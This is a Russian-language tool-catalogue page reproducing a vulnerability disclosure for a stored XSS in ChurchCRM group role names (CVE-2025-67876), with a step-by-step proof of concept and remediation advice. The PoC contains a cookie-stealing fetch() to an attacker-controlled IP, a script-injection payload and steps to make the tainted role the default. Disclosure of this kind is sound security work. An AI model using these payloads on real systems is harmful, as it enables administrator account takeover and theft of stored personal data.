Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-67876 — Подробный proof-of-concept для CVE-2025-67876, демонстрирующий хранимый XSS в именах ролей групп ChurchCRM, приводящий к перехвату сеанса администратора, с полным прохождением эксплуатации и рекомендациями по исправлению. | Kitploit
Инструменты/GitHubGitHub/lukasz-rybak/cve-2025-67876
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеСтатьи и ИсследованияОбучение и Образование
GitHublukasz-rybak/cve-2025-67876

CVE-2025-67876

Подробный proof-of-concept для CVE-2025-67876, демонстрирующий хранимый XSS в именах ролей групп ChurchCRM, приводящий к перехвату сеанса администратора, с полным прохождением эксплуатации и рекомендациями по исправлению.

Репозиторий
25 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-67876: ChurchCRM имеет хранимый XSS в имени роли группы, приводящий к угону сессии администратора

Обзор

ПолеДетали
ID CVECVE-2025-67876
СерьёзностьКритическая
УведомлениеПосмотреть уведомление
ОбнаружилLukasz Rybak

Затронутые продукты

  • ChurchCRM/CRM

Детали

Сводка

В ChurchCRM существует хранимая межсайтовая уязвимость (XSS), которая позволяет пользователю с низкими привилегиями, имеющему разрешение «Управление группами», внедрять постоянный JavaScript в имена ролей группы. Полезная нагрузка сохраняется в базе данных и выполняется всякий раз, когда любой пользователь (включая администраторов) просматривает страницу, на которой отображается эта роль, например GroupView.php или PersonView.php. Это позволяет полностью угнать сессию и захватить учётную запись.

Детали

Корневая причина — отсутствие проверки входных данных и кодирования вывода при обработке имён ролей групп.

При редактировании группы в GroupEditor.php пользователь может изменять имена ролей. Приложение не санирует входные данные (например, нет strip_tags, htmlspecialchars или серверной проверки). Значение сохраняется в таблице базы данных list_lst.

Позже сохранённое значение вставляется непосредственно в HTML без экранирования:

  • В GroupView.php роли групп отображаются внутри ячеек таблицы, обёрнутые в <span>.
  • В PersonView.php назначенные роли пользователя отображаются в разделе «Назначенные группы». Поскольку экранирование не применяется, любой HTML или JavaScript, сохранённый в имени роли, выполняется в браузере жертвы.

Таким образом, пользователь с низкими привилегиями (с разрешением «Управление группами») может повысить свои привилегии до полного администратора, внедрив JavaScript в роль и назначив эту роль администратору.

PoC

Этап 1 — Подготовка атакующего

Создайте x.js на машине, контролируемой атакующим:

fetch('http://172.20.0.1:8000/log?cookie=' + encodeURIComponent(document.cookie));

Запустите сервер для этого файла:

python3 -m http.server 800

Этап 2 — Внедрение XSS-полезной нагрузки

  1. Войдите как пользователь с разрешением «Управление группами».

    изображение
  2. Перейдите в: Группы → Список групп → выберите любую группу → Настройки.

  3. В разделе «Роли групп» измените существующую роль или создайте новую.

  4. Вставьте вредоносную полезную нагрузку:

"><script src=//172.20.0.1:800/x.js></script>

изображение

В списке ролей групп нажмите «По умолчанию» рядом с ролью, содержащей вашу внедрённую XSS-полезную нагрузку. Это гарантирует, что вредоносная роль будет автоматически назначена любому пользователю, добавленному в группу, что повышает вероятность срабатывания XSS при просмотре администратором своего профиля. изображение Нажмите «Удалить» рядом с предыдущей ролью по умолчанию, обычно «Участник». Удаление чистой роли по умолчанию вынуждает систему использовать роль с внедрённым XSS для всех будущих назначений, гарантируя выполнение, когда жертва просматривает любую страницу, отображающую её назначенную роль. изображение

  1. Сохраните имя роли. изображение

Этап 3 — Назначение вредоносной роли жертве

  1. Перейдите на страницу просмотра группы.

  2. Добавьте любого пользователя как участника группы (например, Church Admin).

    изображение
  3. Выберите вредоносную роль из выпадающего списка.

  4. Сохраните назначение.

    изображение

Этап 4 — Выполнение XSS

Когда жертва (администратор) посещает:

  • Свой профиль пользователя: PersonView.php

    изображение
  • Страницу просмотра группы: GroupView.php

Сохранённый JavaScript выполняется немедленно.

На сервере атакующего появятся входящие запросы: изображение

изображение

Это подтверждает успешный захват учётной записи.

Воздействие

  • Хранимый XSS
  • Полный угон сессии администратора
  • Повышение привилегий от пользователя с низкими правами до полного администратора системы
  • Раскрытие всех конфиденциальных персональных данных, хранящихся в ChurchCRM

CWE

CWE-79: Некорректная нейтрализация входных данных при генерации веб-страницы («Межсайтовый скриптинг»)

Рекомендации

  • Реализуйте кодирование вывода (htmlspecialchars) для всех отображений имён ролей.
  • Выполняйте проверку и санацию имён ролей на стороне сервера.
  • Проверьте другие редактируемые поля на основе списков на наличие аналогичных уязвимостей.
  • Рассмотрите возможность использования централизованной библиотеки экранирования или шаблонизатора.

Ссылки

  • https://github.com/ChurchCRM/CRM/security/advisories/GHSA-j9gv-26c7-3qrh

Отказ от ответственности

Эта CVE была раскрыта ответственно в соответствии с практиками скоординированного раскрытия уязвимостей. Информация, представленная здесь, предназначена только для образовательных и защитных целей.

Скачать инструмент